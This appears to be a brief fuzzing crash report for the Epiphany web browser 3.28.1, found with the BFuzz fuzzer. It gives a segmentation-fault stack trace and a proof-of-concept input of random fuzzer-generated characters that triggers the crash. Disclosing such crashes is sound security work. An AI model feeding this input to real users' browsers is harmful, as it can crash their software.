Fuzzing Epiphany

November 2, 2018 ยท View on GitHub

Identified by BFuzz (https://github.com/rootup/bfuzz) Product: Web epiphany 3.28.1

Trace: ===Thread 29 "pool" received signal SIGSEGV, Segmentation fault.=== [Switching to Thread 0x7fff4ffff700 (LWP 28046)] 0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so #0 0x00007ffff7b75db7 in () at /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so #1 0x00007ffff7078c96 in () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 #2 0x00007ffff73fe850 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0 #3 0x00007ffff73fde85 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0 #4 0x00007fffef98b6db in start_thread (arg=0x7fff4ffff700) at pthread_create.c:463 #5 0x00007ffff5e4b88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95

PoC:

/

    duv[%~|tkJ
{NjHPMB 3fi`h

9pDp


1;[l[OXOu%EGCQQFCoF~
@Ik6p'U5MB{TF}[WdGl
#NFku.J }hWhy3GC?M
SsN]v3'R-W]$lagx
^n
m
UMfo'=*